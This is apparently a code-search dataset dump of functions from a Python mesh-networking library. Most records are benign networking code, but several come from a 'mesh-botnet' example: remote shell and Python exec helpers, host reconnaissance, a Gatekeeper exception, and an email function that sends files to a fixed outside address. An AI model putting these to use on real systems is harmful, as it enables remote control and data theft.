packet = f.tr(packet, interface)
if packet:
# if the packet wasn't dropped by a filter, log the recv and place it in the interface's inq
# self.log("IN ", str(interface).ljust(30), packet.decode())
self.inq[interface].put(packet) | run incoming packet through the filters, then place it in its inq | train | https://github.com/pirate/mesh-networking/blob/e8da35d2ecded6930cf2180605bf28479ee555c7/mesh/node.py#L94-L104 | null | class Node(threading.Thread):
"""a Node represents a computer. node.interfaces contains the list of network links the node is connected to.
Nodes process incoming traffic through their filters, then place packets in their inq for their Program to handle.
Programs process packets off the node's incoming queue, then send responses out through node's outbound filters,
and finally out to the right network interface.
"""
def __init__(self, interfaces=None, name="n1", promiscuous=False, mac_addr=None, Filters=(), Program=None):
threading.Thread.__init__(self)
self.name = name
self.interfaces = interfaces or []
self.keep_listening = True
self.promiscuous = promiscuous
self.mac_addr = mac_addr or self._generate_MAC(6, 2)
self.inq = defaultdict(Queue) # TODO: convert to bounded ring-buffer
self.filters = [LoopbackFilter()] + [F() for F in Filters] # initialize the filters that shape incoming and outgoing traffic before it hits the program
self.program = Program(node=self) if Program else None # init the program that will be processing incoming packets
def __repr__(self):
return "[{0}]".format(self.name)
def __str__(self):
return self.__repr__()
@staticmethod
def _generate_MAC(segments=6, segment_length=2, delimiter=":", charset="0123456789abcdef"):
"""generate a non-guaranteed-unique mac address"""
addr = []
for _ in range(segments):
sub = ''.join(random.choice(charset) for _ in range(segment_length))
addr.append(sub)
return delimiter.join(addr)
def log(self, *args):
"""stdout and stderr for the node"""
print("%s %s" % (str(self).ljust(8), " ".join(str(x) for x in args)))
def stop(self):
self.keep_listening = False
if self.program:
self.program.stop()
self.join()
return True
### Runloop
def run(self):
"""runloop that gets triggered by node.start()
reads new packets off the link and feeds them to recv()
"""
if self.program:
self.program.start()
while self.keep_listening:
for interface in self.interfaces:
packet = interface.recv(self.mac_addr if not self.promiscuous else "00:00:00:00:00:00")
if packet:
self.recv(packet, interface)
time.sleep(0.01)
self.log("Stopped listening.")
### IO
def send(self, packet, interfaces=None):
"""write packet to given interfaces, default is broadcast to all interfaces"""
interfaces = interfaces or self.interfaces # default to all interfaces
interfaces = interfaces if hasattr(interfaces, '__iter__') else [interfaces]
for interface in interfaces:
for f in self.filters:
packet = f.tx(packet, interface) # run outgoing packet through the filters
if packet:
# if not dropped, log the transmit and pass it to the interface's send method
# self.log("OUT ", ("<"+",".join(i.name for i in interfaces)+">").ljust(30), packet.decode())
interface.send(packet)
|
pirate/mesh-networking | mesh/node.py | Node.send | python | def send(self, packet, interfaces=None):
interfaces = interfaces or self.interfaces # default to all interfaces
interfaces = interfaces if hasattr(interfaces, '__iter__') else [interfaces]
for interface in interfaces:
for f in self.filters:
packet = f.tx(packet, interface) # run outgoing packet through the filters
if packet:
# if not dropped, log the transmit and pass it to the interface's send method
# self.log("OUT ", ("<"+",".join(i.name for i in interfaces)+">").ljust(30), packet.decode())
interface.send(packet) | write packet to given interfaces, default is broadcast to all interfaces | train | https://github.com/pirate/mesh-networking/blob/e8da35d2ecded6930cf2180605bf28479ee555c7/mesh/node.py#L106-L117 | null | class Node(threading.Thread):
"""a Node represents a computer. node.interfaces contains the list of network links the node is connected to.
Nodes process incoming traffic through their filters, then place packets in their inq for their Program to handle.
Programs process packets off the node's incoming queue, then send responses out through node's outbound filters,
and finally out to the right network interface.
"""
def __init__(self, interfaces=None, name="n1", promiscuous=False, mac_addr=None, Filters=(), Program=None):
threading.Thread.__init__(self)
self.name = name
self.interfaces = interfaces or []
self.keep_listening = True
self.promiscuous = promiscuous
self.mac_addr = mac_addr or self._generate_MAC(6, 2)
self.inq = defaultdict(Queue) # TODO: convert to bounded ring-buffer
self.filters = [LoopbackFilter()] + [F() for F in Filters] # initialize the filters that shape incoming and outgoing traffic before it hits the program
self.program = Program(node=self) if Program else None # init the program that will be processing incoming packets
def __repr__(self):
return "[{0}]".format(self.name)
def __str__(self):
return self.__repr__()
@staticmethod
def _generate_MAC(segments=6, segment_length=2, delimiter=":", charset="0123456789abcdef"):
"""generate a non-guaranteed-unique mac address"""
addr = []
for _ in range(segments):
sub = ''.join(random.choice(charset) for _ in range(segment_length))
addr.append(sub)
return delimiter.join(addr)
def log(self, *args):
"""stdout and stderr for the node"""
print("%s %s" % (str(self).ljust(8), " ".join(str(x) for x in args)))
def stop(self):
self.keep_listening = False
if self.program:
self.program.stop()
self.join()
return True
### Runloop
def run(self):
"""runloop that gets triggered by node.start()
reads new packets off the link and feeds them to recv()
"""
if self.program:
self.program.start()
while self.keep_listening:
for interface in self.interfaces:
packet = interface.recv(self.mac_addr if not self.promiscuous else "00:00:00:00:00:00")
if packet:
self.recv(packet, interface)
time.sleep(0.01)
self.log("Stopped listening.")
### IO
def recv(self, packet, interface):
"""run incoming packet through the filters, then place it in its inq"""
# the packet is piped into the first filter, then the result of that into the second filter, etc.
for f in self.filters:
if not packet:
break
packet = f.tr(packet, interface)
if packet:
# if the packet wasn't dropped by a filter, log the recv and place it in the interface's inq
# self.log("IN ", str(interface).ljust(30), packet.decode())
self.inq[interface].put(packet)
|
pirate/mesh-networking | mesh/routers.py | chunk | python | def chunk(iterable, chunk_size=20):
items = []
for value in iterable:
items.append(value)
if len(items) == chunk_size:
yield items
items = []
if items:
yield items | chunk an iterable [1,2,3,4,5,6,7,8] -> ([1,2,3], [4,5,6], [7,8]) | train | https://github.com/pirate/mesh-networking/blob/e8da35d2ecded6930cf2180605bf28479ee555c7/mesh/routers.py#L1-L10 | null |
class MessageRouter(object):
node = None
routes = []
def route(self, pattern):
def wrapper(handler):
self.routes.append((pattern, handler))
return handler
return wrapper
def recv(self, program, message, interface=None):
def default_route(program, message=None, interface=None):
# print('Unrecognized Message msg: {0}'.format(message))
pass
# run through route patterns looking for a match to handle the msg
for pattern, handler in self.routes:
# if pattern is a compiled regex, try matching it
if hasattr(pattern, 'match') and pattern.match(message):
break
# if pattern is just a str, check for exact match
if message == pattern:
break
else:
# if no route matches, fall back to default handler
handler = default_route
handler(program, message, interface)
|
pirate/mesh-networking | mesh/filters.py | StringFilter.match | python | def match(cls, pattern, inverse=False):
string_pattern = pattern
invert_search = inverse
class DefinedStringFilter(cls):
pattern = string_pattern
inverse = invert_search
return DefinedStringFilter | Factory method to create a StringFilter which filters with the given pattern. | train | https://github.com/pirate/mesh-networking/blob/e8da35d2ecded6930cf2180605bf28479ee555c7/mesh/filters.py#L112-L120 | null | class StringFilter(BaseFilter):
"""Filter for packets that contain a string pattern.
Node('mynode', Filters=[StringFilter.match('pattern'), ...])
"""
def tr(self, packet, interface):
if not packet: return None
if not self.inverse:
return packet if self.pattern in packet else None
else:
return packet if self.pattern not in packet else None
@classmethod
@classmethod
def dontmatch(cls, pattern):
return cls.match(pattern, inverse=True)
|
pirate/mesh-networking | examples/mesh-botnet/shell_tools.py | run_cmd | python | def run_cmd(command, verbose=True, shell='/bin/bash'):
process = Popen(command, shell=True, stdout=PIPE, stderr=STDOUT, executable=shell)
output = process.stdout.read().decode().strip().split('\n')
if verbose:
# return full output including empty lines
return output
return [line for line in output if line.strip()] | internal helper function to run shell commands and get output | train | https://github.com/pirate/mesh-networking/blob/e8da35d2ecded6930cf2180605bf28479ee555c7/examples/mesh-botnet/shell_tools.py#L5-L12 | null | import sys
from io import StringIO
from subprocess import Popen, PIPE, STDOUT
def run_python(cmd, timeout=60):
"""interactively interpret recieved python code"""
try:
try:
buffer = StringIO()
sys.stdout = buffer
exec(cmd)
sys.stdout = sys.__stdout__
out = buffer.getvalue()
except Exception as error:
out = error
out = str(out).strip()
if len(out) < 1:
try:
out = "[eval]: "+str(eval(cmd))
except Exception as error:
out = "[eval]: "+str(error)
else:
out = "[exec]: "+out
except Exception as python_exception:
out = "[X]: %s" % python_exception
return out.strip()
def run_shell(cmd, timeout=60, verbose=False):
"""run a shell command and return the output, verbose enables live command output via yield"""
retcode = None
try:
p = Popen(cmd, shell=True, stdout=PIPE, stderr=STDOUT, executable='/bin/bash')
continue_running = True
except Exception as e:
yield("Failed: %s" % e)
continue_running = False
while continue_running:
try:
line = p.stdout.readline()
if verbose and line:
yield(line)
elif line.strip():
yield(line.strip())
except Exception:
pass
try:
data = irc.recv(4096)
except Exception as e:
data = ""
retcode = p.poll() # returns None while subprocess is running
if '!cancel' in data:
retcode = "Cancelled live output reading. You have to kill the process manually."
yield "[X]: %s" % retcode
break
elif retcode is not None:
try:
line = p.stdout.read()
except:
retcode = "Too much output, read timed out. Process is still running in background."
if verbose and line:
yield line
if retcode != 0:
yield "[X]: %s" % retcode
elif retcode == 0 and verbose:
yield "[√]"
break
|
pirate/mesh-networking | examples/mesh-botnet/shell_tools.py | run_python | python | def run_python(cmd, timeout=60):
try:
try:
buffer = StringIO()
sys.stdout = buffer
exec(cmd)
sys.stdout = sys.__stdout__
out = buffer.getvalue()
except Exception as error:
out = error
out = str(out).strip()
if len(out) < 1:
try:
out = "[eval]: "+str(eval(cmd))
except Exception as error:
out = "[eval]: "+str(error)
else:
out = "[exec]: "+out
except Exception as python_exception:
out = "[X]: %s" % python_exception
return out.strip() | interactively interpret recieved python code | train | https://github.com/pirate/mesh-networking/blob/e8da35d2ecded6930cf2180605bf28479ee555c7/examples/mesh-botnet/shell_tools.py#L14-L39 | null | import sys
from io import StringIO
from subprocess import Popen, PIPE, STDOUT
def run_cmd(command, verbose=True, shell='/bin/bash'):
"""internal helper function to run shell commands and get output"""
process = Popen(command, shell=True, stdout=PIPE, stderr=STDOUT, executable=shell)
output = process.stdout.read().decode().strip().split('\n')
if verbose:
# return full output including empty lines
return output
return [line for line in output if line.strip()]
def run_shell(cmd, timeout=60, verbose=False):
"""run a shell command and return the output, verbose enables live command output via yield"""
retcode = None
try:
p = Popen(cmd, shell=True, stdout=PIPE, stderr=STDOUT, executable='/bin/bash')
continue_running = True
except Exception as e:
yield("Failed: %s" % e)
continue_running = False
while continue_running:
try:
line = p.stdout.readline()
if verbose and line:
yield(line)
elif line.strip():
yield(line.strip())
except Exception:
pass
try:
data = irc.recv(4096)
except Exception as e:
data = ""
retcode = p.poll() # returns None while subprocess is running
if '!cancel' in data:
retcode = "Cancelled live output reading. You have to kill the process manually."
yield "[X]: %s" % retcode
break
elif retcode is not None:
try:
line = p.stdout.read()
except:
retcode = "Too much output, read timed out. Process is still running in background."
if verbose and line:
yield line
if retcode != 0:
yield "[X]: %s" % retcode
elif retcode == 0 and verbose:
yield "[√]"
break
|
pirate/mesh-networking | examples/mesh-botnet/shell_tools.py | run_shell | python | def run_shell(cmd, timeout=60, verbose=False):
retcode = None
try:
p = Popen(cmd, shell=True, stdout=PIPE, stderr=STDOUT, executable='/bin/bash')
continue_running = True
except Exception as e:
yield("Failed: %s" % e)
continue_running = False
while continue_running:
try:
line = p.stdout.readline()
if verbose and line:
yield(line)
elif line.strip():
yield(line.strip())
except Exception:
pass
try:
data = irc.recv(4096)
except Exception as e:
data = ""
retcode = p.poll() # returns None while subprocess is running
if '!cancel' in data:
retcode = "Cancelled live output reading. You have to kill the process manually."
yield "[X]: %s" % retcode
break
elif retcode is not None:
try:
line = p.stdout.read()
except:
retcode = "Too much output, read timed out. Process is still running in background."
if verbose and line:
yield line
if retcode != 0:
yield "[X]: %s" % retcode
elif retcode == 0 and verbose:
yield "[√]"
break | run a shell command and return the output, verbose enables live command output via yield | train | https://github.com/pirate/mesh-networking/blob/e8da35d2ecded6930cf2180605bf28479ee555c7/examples/mesh-botnet/shell_tools.py#L41-L86 | null | import sys
from io import StringIO
from subprocess import Popen, PIPE, STDOUT
def run_cmd(command, verbose=True, shell='/bin/bash'):
"""internal helper function to run shell commands and get output"""
process = Popen(command, shell=True, stdout=PIPE, stderr=STDOUT, executable=shell)
output = process.stdout.read().decode().strip().split('\n')
if verbose:
# return full output including empty lines
return output
return [line for line in output if line.strip()]
def run_python(cmd, timeout=60):
"""interactively interpret recieved python code"""
try:
try:
buffer = StringIO()
sys.stdout = buffer
exec(cmd)
sys.stdout = sys.__stdout__
out = buffer.getvalue()
except Exception as error:
out = error
out = str(out).strip()
if len(out) < 1:
try:
out = "[eval]: "+str(eval(cmd))
except Exception as error:
out = "[eval]: "+str(error)
else:
out = "[exec]: "+out
except Exception as python_exception:
out = "[X]: %s" % python_exception
return out.strip()
|
pirate/mesh-networking | examples/mesh-botnet/system_info.py | get_platform | python | def get_platform():
mac_version = str(platform.mac_ver()[0]).strip() # e.g. 10.11.2
if mac_version:
return 'OS X %s' % mac_version
return platform.platform().strip() | get Mac OS X version or kernel version if mac version is not found | train | https://github.com/pirate/mesh-networking/blob/e8da35d2ecded6930cf2180605bf28479ee555c7/examples/mesh-botnet/system_info.py#L9-L14 | null | import getpass
import platform
import socket
import uuid
from shell_tools import run_cmd
### System
# e.g. Darwin-15.4.0-x86_64-i386-64bit
def get_current_user():
"""guess the username this program is running under"""
return getpass.getuser()
def get_main_user():
"""guess the primary user of the computer who is currently logged in"""
# Guess main user by seeing who is currently running Finder.app
main_user = run_cmd("ps aux | grep CoreServices/Finder.app | head -1 | awk '{print $1}'")[0]
if not main_user or main_user == 'root':
# fallback to guess main user by seeing who owns the console file
main_user = run_cmd("stat -f '%Su' /dev/console")[0]
return main_user
def get_full_username(user):
"""sarah -> Sarah J. Connor"""
full_name = run_cmd("finger %s | awk -F: '{ print $3 }' | head -n1 | sed 's/^ //'" % user)[0]
return full_name or user
def get_hardware():
"""detailed hardware overview from system profiler"""
return run_cmd('system_profiler SPHardwareDataType', verbose=False)[1:]
def get_power():
"""detect whether computer is plugged in"""
return run_cmd("system_profiler SPPowerDataType | grep -q Connected && echo 'Connected' || echo 'Disconnected'")[0]
def get_uptime():
return run_cmd('uptime')[0]
### Networking
def get_hostname():
return socket.gethostname()
def get_local_ips():
"""parse ifconfig for all the computer's local IP addresses"""
local_ips = run_cmd(r"ifconfig -a | perl -nle'/(\d+\.\d+\.\d+\.\d+)/ && print $1'")
local_ips.remove('127.0.0.1')
return local_ips
def get_public_ip():
"""get the computer's current public IP by querying the opendns public ip resolver"""
return run_cmd('dig +short myip.opendns.com @resolver1.opendns.com')[0]
def get_mac_addr():
"""get the computer's current internet-facing MAC address"""
return ':'.join([
'{:02x}'.format((uuid.getnode() >> i) & 0xff)
for i in range(0,8*6,8)
][::-1])
def get_irc_nickname(full_name):
"""Sarah J. Connor -> [SarahJ.Connor]"""
return '[%s]' % full_name.replace(" ", "")[:14]
def get_location():
"""guess the computer's current geolocation based on IP address"""
# geo_info = geo_locate()
# location = geo_info[0]+", "+geo_info[1]+" ("+str(geo_info[4])+", "+str(geo_info[5])+")"
return 'Atlanta'
def add_gatekeeper_exception(app_path):
"""WARNING: big scary password prompt is shown to the current active user"""
return run_cmd('spctl --add "%s"' % app_path)
def lock_screen():
return run_cmd('/System/Library/CoreServices/Menu\ Extras/User.menu/Contents/Resources/CGSession -suspend')
def screensaver():
return run_cmd('open /System/Library/Frameworks/ScreenSaver.framework/Versions/A/Resources/ScreenSaverEngine.app')
|
pirate/mesh-networking | mesh/programs.py | BaseProgram.run | python | def run(self):
while self.keep_listening:
for interface in self.node.interfaces:
try:
self.recv(self.node.inq[interface].get(timeout=0), interface)
except Empty:
sleep(0.01) | runloop that reads packets off the node's incoming packet buffer (node.inq) | train | https://github.com/pirate/mesh-networking/blob/e8da35d2ecded6930cf2180605bf28479ee555c7/mesh/programs.py#L21-L28 | [
"def recv(self, packet, interface):\n \"\"\"overload this and put logic here to actually do something with the packet\"\"\"\n pass\n"
] | class BaseProgram(threading.Thread):
"""Represents a program running on a Node that interprets and responds to incoming packets."""
def __init__(self, node):
threading.Thread.__init__(self)
self.keep_listening = True
self.node = node
def stop(self):
self.keep_listening = False
self.join()
def recv(self, packet, interface):
"""overload this and put logic here to actually do something with the packet"""
pass
|
pirate/mesh-networking | examples/mesh-botnet/communication.py | email | python | def email(to='medusa@sweeting.me', _from=default_from, subject='BOT MSG', message="Info email", attachments=None):
for attachment in attachments or []:
filename = attachment.strip()
try:
result = run_cmd('uuencode %s %s | mailx -s "%s" %s' % (filename, filename, subject, to))[0]
return "Sending email From: %s; To: %s; Subject: %s; Attachment: %s (%s)" % (_from, to, subject, filename, result or 'Succeded')
except Exception as error:
return str(error)
if not attachments:
p = os.popen("/usr/sbin/sendmail -t", "w")
p.write("From: %s\n" % _from)
p.write("To: %s\n" % to)
p.write("Subject: %s\n" % subject)
p.write("\n") # blank line separating headers from body
p.write('%s\n' % message)
result = p.close()
if not result:
return "Sent email From: %s; To: %s; Subject: %s; Attachments: %s)" % (_from, to, subject, ','.join(attachments or []))
else:
return "Error: %s. Please fix Postfix:\n %s" % (result, help_str) | function to send mail to a specified address with the given attachments | train | https://github.com/pirate/mesh-networking/blob/e8da35d2ecded6930cf2180605bf28479ee555c7/examples/mesh-botnet/communication.py#L13-L35 | [
"def run_cmd(command, verbose=True, shell='/bin/bash'):\n \"\"\"internal helper function to run shell commands and get output\"\"\"\n process = Popen(command, shell=True, stdout=PIPE, stderr=STDOUT, executable=shell)\n output = process.stdout.read().decode().strip().split('\\n')\n if verbose:\n #... | import os
from shell_tools import run_cmd
from settings import HOSTNAME, MAIN_USER
default_from = '%s@%s' % (MAIN_USER, HOSTNAME)
help_str = """
sudo mkdir -p /Library/Server/Mail/Data/spool
sudo /usr/sbin/postfix set-permissions
sudo /usr/sbin/postfix start
"""
|
pirate/mesh-networking | mesh/links.py | VirtualLink.log | python | def log(self, *args):
print("%s %s" % (str(self).ljust(8), " ".join([str(x) for x in args]))) | stdout and stderr for the link | train | https://github.com/pirate/mesh-networking/blob/e8da35d2ecded6930cf2180605bf28479ee555c7/mesh/links.py#L54-L56 | null | class VirtualLink:
"""A Link represents a network link between Nodes.
Nodes.interfaces is a list of the [Link]s that it's connected to.
Some links are BROADCAST (all connected nodes get a copy of all packets),
others are UNICAST (you only see packets directed to you), or
MULTICAST (you can send packets to several people at once).
Some links are virtual, others actually send the traffic over UDP or IRC.
Give two nodes the same VirtualLink() object to simulate connecting them with a cable."""
broadcast_addr = "00:00:00:00:00:00:00"
def __init__(self, name="vlan1"):
self.name = name
self.keep_listening = True
# buffer for receiving incoming packets
self.inq = defaultdict(Queue) # mac_addr: [packet1, packet2, ...]
self.inq[self.broadcast_addr] = Queue()
### Utilities
def __repr__(self):
return "<%s>" % self.name
def __str__(self):
return self.__repr__()
def __len__(self):
"""number of nodes listening for packets on this link"""
return len(self.inq)
### Runloop
def start(self):
"""all links need to have a start() method because threaded ones use it start their runloops"""
self.log("ready.")
return True
def stop(self):
"""all links also need stop() to stop their runloops"""
self.keep_listening = False
# if threaded, kill threads before going down
if hasattr(self, 'join'):
self.join()
self.log("Went down.")
return True
### IO
def recv(self, mac_addr=broadcast_addr, timeout=0):
"""read packet off the recv queue for a given address, optional timeout to block and wait for packet"""
# recv on the broadcast address "00:..:00" will give you all packets (for promiscuous mode)
if self.keep_listening:
try:
return self.inq[str(mac_addr)].get(timeout=timeout)
except Empty:
return ""
else:
self.log("is down.")
def send(self, packet, mac_addr=broadcast_addr):
"""place sent packets directly into the reciever's queues (as if they are connected by wire)"""
if self.keep_listening:
if mac_addr == self.broadcast_addr:
for addr, recv_queue in self.inq.items():
recv_queue.put(packet)
else:
self.inq[mac_addr].put(packet)
self.inq[self.broadcast_addr].put(packet)
else:
self.log("is down.")
|
pirate/mesh-networking | mesh/links.py | VirtualLink.stop | python | def stop(self):
self.keep_listening = False
# if threaded, kill threads before going down
if hasattr(self, 'join'):
self.join()
self.log("Went down.")
return True | all links also need stop() to stop their runloops | train | https://github.com/pirate/mesh-networking/blob/e8da35d2ecded6930cf2180605bf28479ee555c7/mesh/links.py#L65-L72 | [
"def log(self, *args):\n \"\"\"stdout and stderr for the link\"\"\"\n print(\"%s %s\" % (str(self).ljust(8), \" \".join([str(x) for x in args])))\n"
] | class VirtualLink:
"""A Link represents a network link between Nodes.
Nodes.interfaces is a list of the [Link]s that it's connected to.
Some links are BROADCAST (all connected nodes get a copy of all packets),
others are UNICAST (you only see packets directed to you), or
MULTICAST (you can send packets to several people at once).
Some links are virtual, others actually send the traffic over UDP or IRC.
Give two nodes the same VirtualLink() object to simulate connecting them with a cable."""
broadcast_addr = "00:00:00:00:00:00:00"
def __init__(self, name="vlan1"):
self.name = name
self.keep_listening = True
# buffer for receiving incoming packets
self.inq = defaultdict(Queue) # mac_addr: [packet1, packet2, ...]
self.inq[self.broadcast_addr] = Queue()
### Utilities
def __repr__(self):
return "<%s>" % self.name
def __str__(self):
return self.__repr__()
def __len__(self):
"""number of nodes listening for packets on this link"""
return len(self.inq)
def log(self, *args):
"""stdout and stderr for the link"""
print("%s %s" % (str(self).ljust(8), " ".join([str(x) for x in args])))
### Runloop
def start(self):
"""all links need to have a start() method because threaded ones use it start their runloops"""
self.log("ready.")
return True
### IO
def recv(self, mac_addr=broadcast_addr, timeout=0):
"""read packet off the recv queue for a given address, optional timeout to block and wait for packet"""
# recv on the broadcast address "00:..:00" will give you all packets (for promiscuous mode)
if self.keep_listening:
try:
return self.inq[str(mac_addr)].get(timeout=timeout)
except Empty:
return ""
else:
self.log("is down.")
def send(self, packet, mac_addr=broadcast_addr):
"""place sent packets directly into the reciever's queues (as if they are connected by wire)"""
if self.keep_listening:
if mac_addr == self.broadcast_addr:
for addr, recv_queue in self.inq.items():
recv_queue.put(packet)
else:
self.inq[mac_addr].put(packet)
self.inq[self.broadcast_addr].put(packet)
else:
self.log("is down.")
|
pirate/mesh-networking | mesh/links.py | VirtualLink.recv | python | def recv(self, mac_addr=broadcast_addr, timeout=0):
# recv on the broadcast address "00:..:00" will give you all packets (for promiscuous mode)
if self.keep_listening:
try:
return self.inq[str(mac_addr)].get(timeout=timeout)
except Empty:
return ""
else:
self.log("is down.") | read packet off the recv queue for a given address, optional timeout to block and wait for packet | train | https://github.com/pirate/mesh-networking/blob/e8da35d2ecded6930cf2180605bf28479ee555c7/mesh/links.py#L76-L85 | [
"def log(self, *args):\n \"\"\"stdout and stderr for the link\"\"\"\n print(\"%s %s\" % (str(self).ljust(8), \" \".join([str(x) for x in args])))\n"
] | class VirtualLink:
"""A Link represents a network link between Nodes.
Nodes.interfaces is a list of the [Link]s that it's connected to.
Some links are BROADCAST (all connected nodes get a copy of all packets),
others are UNICAST (you only see packets directed to you), or
MULTICAST (you can send packets to several people at once).
Some links are virtual, others actually send the traffic over UDP or IRC.
Give two nodes the same VirtualLink() object to simulate connecting them with a cable."""
broadcast_addr = "00:00:00:00:00:00:00"
def __init__(self, name="vlan1"):
self.name = name
self.keep_listening = True
# buffer for receiving incoming packets
self.inq = defaultdict(Queue) # mac_addr: [packet1, packet2, ...]
self.inq[self.broadcast_addr] = Queue()
### Utilities
def __repr__(self):
return "<%s>" % self.name
def __str__(self):
return self.__repr__()
def __len__(self):
"""number of nodes listening for packets on this link"""
return len(self.inq)
def log(self, *args):
"""stdout and stderr for the link"""
print("%s %s" % (str(self).ljust(8), " ".join([str(x) for x in args])))
### Runloop
def start(self):
"""all links need to have a start() method because threaded ones use it start their runloops"""
self.log("ready.")
return True
def stop(self):
"""all links also need stop() to stop their runloops"""
self.keep_listening = False
# if threaded, kill threads before going down
if hasattr(self, 'join'):
self.join()
self.log("Went down.")
return True
### IO
def send(self, packet, mac_addr=broadcast_addr):
"""place sent packets directly into the reciever's queues (as if they are connected by wire)"""
if self.keep_listening:
if mac_addr == self.broadcast_addr:
for addr, recv_queue in self.inq.items():
recv_queue.put(packet)
else:
self.inq[mac_addr].put(packet)
self.inq[self.broadcast_addr].put(packet)
else:
self.log("is down.")
|
pirate/mesh-networking | mesh/links.py | VirtualLink.send | python | def send(self, packet, mac_addr=broadcast_addr):
if self.keep_listening:
if mac_addr == self.broadcast_addr:
for addr, recv_queue in self.inq.items():
recv_queue.put(packet)
else:
self.inq[mac_addr].put(packet)
self.inq[self.broadcast_addr].put(packet)
else:
self.log("is down.") | place sent packets directly into the reciever's queues (as if they are connected by wire) | train | https://github.com/pirate/mesh-networking/blob/e8da35d2ecded6930cf2180605bf28479ee555c7/mesh/links.py#L87-L97 | [
"def log(self, *args):\n \"\"\"stdout and stderr for the link\"\"\"\n print(\"%s %s\" % (str(self).ljust(8), \" \".join([str(x) for x in args])))\n"
] | class VirtualLink:
"""A Link represents a network link between Nodes.
Nodes.interfaces is a list of the [Link]s that it's connected to.
Some links are BROADCAST (all connected nodes get a copy of all packets),
others are UNICAST (you only see packets directed to you), or
MULTICAST (you can send packets to several people at once).
Some links are virtual, others actually send the traffic over UDP or IRC.
Give two nodes the same VirtualLink() object to simulate connecting them with a cable."""
broadcast_addr = "00:00:00:00:00:00:00"
def __init__(self, name="vlan1"):
self.name = name
self.keep_listening = True
# buffer for receiving incoming packets
self.inq = defaultdict(Queue) # mac_addr: [packet1, packet2, ...]
self.inq[self.broadcast_addr] = Queue()
### Utilities
def __repr__(self):
return "<%s>" % self.name
def __str__(self):
return self.__repr__()
def __len__(self):
"""number of nodes listening for packets on this link"""
return len(self.inq)
def log(self, *args):
"""stdout and stderr for the link"""
print("%s %s" % (str(self).ljust(8), " ".join([str(x) for x in args])))
### Runloop
def start(self):
"""all links need to have a start() method because threaded ones use it start their runloops"""
self.log("ready.")
return True
def stop(self):
"""all links also need stop() to stop their runloops"""
self.keep_listening = False
# if threaded, kill threads before going down
if hasattr(self, 'join'):
self.join()
self.log("Went down.")
return True
### IO
def recv(self, mac_addr=broadcast_addr, timeout=0):
"""read packet off the recv queue for a given address, optional timeout to block and wait for packet"""
# recv on the broadcast address "00:..:00" will give you all packets (for promiscuous mode)
if self.keep_listening:
try:
return self.inq[str(mac_addr)].get(timeout=timeout)
except Empty:
return ""
else:
self.log("is down.")
|
pirate/mesh-networking | mesh/links.py | UDPLink._initsocket | python | def _initsocket(self):
self.send_socket = socket(AF_INET, SOCK_DGRAM)
self.send_socket.setblocking(0)
self.send_socket.setsockopt(SOL_SOCKET, SO_BROADCAST, 1)
self.recv_socket = socket(AF_INET, SOCK_DGRAM)
self.recv_socket.setblocking(0)
if IS_BSD:
self.recv_socket.setsockopt(SOL_SOCKET, SO_REUSEPORT, 1) # requires sudo
self.recv_socket.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1) # allows multiple UDPLinks to all listen for UDP packets
self.recv_socket.bind(('', self.port)) | bind to the datagram socket (UDP), and enable BROADCAST mode | train | https://github.com/pirate/mesh-networking/blob/e8da35d2ecded6930cf2180605bf28479ee555c7/mesh/links.py#L116-L127 | null | class UDPLink(threading.Thread, VirtualLink):
"""This link sends all traffic as BROADCAST UDP packets on all physical ifaces.
Connect nodes on two different laptops to a UDPLink() with the same port and they will talk over wifi or ethernet.
"""
def __init__(self, name="en0", port=2016):
# UDPLinks have to be run in a seperate thread
# they rely on the infinite run() loop to read packets out of the socket, which would block the main thread
threading.Thread.__init__(self)
VirtualLink.__init__(self, name=name)
self.port = port
# self.log("starting...")
self._initsocket()
def __repr__(self):
return "<" + self.name + ">"
### Runloop
def run(self):
"""runloop that reads incoming packets off the interface into the inq buffer"""
# self.log("ready to receive.")
# we use a runloop instead of synchronous recv so stopping the node mid-recv is possible
read_ready = None
while self.keep_listening:
try:
read_ready, w, x = select.select([self.recv_socket], [], [], 0.01)
except Exception:
# catch timeouts
pass
if read_ready:
packet, addr = read_ready[0].recvfrom(4096)
if addr[1] == self.port:
# for each address listening to this link
for mac_addr, recv_queue in self.inq.items():
recv_queue.put(packet) # put packet in node's recv queue
else:
pass # not meant for us, it was sent to a different port
### IO
def send(self, packet, retry=True):
"""send a packet down the line to the inteface"""
addr = ('255.255.255.255', self.port) # 255. is the broadcast IP for UDP
try:
self.send_socket.sendto(packet, addr)
except Exception as e:
self.log("Link failed to send packet over socket %s" % e)
sleep(0.2)
if retry:
self.send(packet, retry=False)
|
pirate/mesh-networking | mesh/links.py | UDPLink.run | python | def run(self):
# self.log("ready to receive.")
# we use a runloop instead of synchronous recv so stopping the node mid-recv is possible
read_ready = None
while self.keep_listening:
try:
read_ready, w, x = select.select([self.recv_socket], [], [], 0.01)
except Exception:
# catch timeouts
pass
if read_ready:
packet, addr = read_ready[0].recvfrom(4096)
if addr[1] == self.port:
# for each address listening to this link
for mac_addr, recv_queue in self.inq.items():
recv_queue.put(packet) # put packet in node's recv queue
else:
pass | runloop that reads incoming packets off the interface into the inq buffer | train | https://github.com/pirate/mesh-networking/blob/e8da35d2ecded6930cf2180605bf28479ee555c7/mesh/links.py#L131-L151 | null | class UDPLink(threading.Thread, VirtualLink):
"""This link sends all traffic as BROADCAST UDP packets on all physical ifaces.
Connect nodes on two different laptops to a UDPLink() with the same port and they will talk over wifi or ethernet.
"""
def __init__(self, name="en0", port=2016):
# UDPLinks have to be run in a seperate thread
# they rely on the infinite run() loop to read packets out of the socket, which would block the main thread
threading.Thread.__init__(self)
VirtualLink.__init__(self, name=name)
self.port = port
# self.log("starting...")
self._initsocket()
def __repr__(self):
return "<" + self.name + ">"
def _initsocket(self):
"""bind to the datagram socket (UDP), and enable BROADCAST mode"""
self.send_socket = socket(AF_INET, SOCK_DGRAM)
self.send_socket.setblocking(0)
self.send_socket.setsockopt(SOL_SOCKET, SO_BROADCAST, 1)
self.recv_socket = socket(AF_INET, SOCK_DGRAM)
self.recv_socket.setblocking(0)
if IS_BSD:
self.recv_socket.setsockopt(SOL_SOCKET, SO_REUSEPORT, 1) # requires sudo
self.recv_socket.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1) # allows multiple UDPLinks to all listen for UDP packets
self.recv_socket.bind(('', self.port))
### Runloop
# not meant for us, it was sent to a different port
### IO
def send(self, packet, retry=True):
"""send a packet down the line to the inteface"""
addr = ('255.255.255.255', self.port) # 255. is the broadcast IP for UDP
try:
self.send_socket.sendto(packet, addr)
except Exception as e:
self.log("Link failed to send packet over socket %s" % e)
sleep(0.2)
